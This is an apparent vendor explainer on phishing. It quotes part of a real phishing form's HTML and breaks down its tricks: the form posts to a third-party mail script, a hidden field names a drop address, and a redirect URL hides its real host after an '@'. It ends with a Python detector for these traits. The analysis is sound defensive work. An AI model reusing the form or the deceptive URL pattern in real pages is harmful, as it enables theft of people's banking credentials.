Exploits (Phishing)

Click here to view an example of a typical "Phishing" page. This actually arrived in an e-mail, but is displayed as a web page for demonstration purposes. I like how they actually have the gall to ask for a PIN as well! Having the PIN allows them to program a credit card or ATM card with your account information and go to the bank to physically retrieve your funds.

A close look at the form reveals the following HTML code:

<form name=Order action=http://www.webhost4life.com/cgi-bin/ultra/ultra-mail.pl method=post>
<input type="hidden" name="XX-subject" value="Full Infoz Hacked" >
<input type="hidden" name="XX-send-to-email" value="brucehriver@hotmail.com" >
<input type="hidden" name="XX-redirect-to-url"
       value="http://www.PayPal.com.Account.Refreshing.Sucessful\
           ahsfgSADFeaAWDAWasdasdWAadsadWAF\
           AWdasdygfEASFeyeguASDFaerghaeDDFEasd\
           fEAa@fire.prohosting.com/sniper47/Complete1.htm" >
<input type="hidden" name=XX-name size=40 value="Hacked By Sn|p3rWo|f">
<input type="hidden" name=XX-email size=40 value="PayPal-Hacked@Full-Infoz-Hacked.com"> 
.......

There are a couple of things going on here.

First of all, the page loads all of its images from the actual PayPal site, the same one PayPal uses to display images in its genuine e-mail messages. As a result, it looks extremely authentic.

Second, the form posts to a web site that the hacker does not own. They have found a script on 'WebHost4Life' that sends automated e-mail messages to an e-mail address that is specified in the form. (The script has since been removed.) The information is then sent to a Hotmail account, which is effectively untraceable. I wouldn't even be surprised if the Hotmail account is hacked or compromised as well.
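
The traits visible in the form above can be checked mechanically: a POST to a host outside the brand's own domain, a hidden field carrying a recipient mail address, and a redirect URL whose PayPal-looking text sits before an "@", so the real host is the one after it. The following is an added example, not code from the original page; the names audit and FormCollector, the sample markup and its .example hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

EMAIL_RE = re.compile(r"^[^@\s/]+@[^@\s/]+\.[A-Za-z]{2,}$")
# Constructed sample modelled on the form above; hosts are reserved .example names.
SAMPLE = """
<form name=Order action=http://forms.hosting.example/cgi-bin/mailer.pl method=post>
<input type="hidden" name="XX-send-to-email" value="drop@mail.example">
<input type="hidden" name="XX-redirect-to-url"
       value="http://www.bank.example.Account.OK.aZxQ@files.hosting.example/done.htm">
"""

class FormCollector(HTMLParser):
    """Collect form actions and hidden-field values from an HTML message body."""
    def __init__(self):
        super().__init__()
        self.actions, self.hidden = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden.append((a.get("name") or "", a.get("value") or ""))

def audit(html, claimed_domain):
    """Return findings for a message that claims to come from claimed_domain."""
    def on_brand(host):
        host = (host or "").lower()
        return host == claimed_domain or host.endswith("." + claimed_domain)

    page = FormCollector()
    page.feed(html)
    findings = []
    for action in page.actions:
        host = urlsplit(action).hostname
        if not on_brand(host):
            findings.append(f"form posts to third-party host {host}")
    for name, value in page.hidden:
        if EMAIL_RE.match(value):
            findings.append(f"hidden field {name} holds a mail address")
        elif value.lower().startswith(("http://", "https://")):
            url = urlsplit(value)
            # Text before '@' is userinfo; the browser connects to the host after it.
            if url.username and not on_brand(url.hostname):
                findings.append(f"hidden URL in {name} resolves to {url.hostname}")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE, "bank.example")))
```

A form whose action and hidden URLs all stay on the claimed domain produces an empty list.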

Copyright ©2006 Blue Coat Systems. All rights reserved.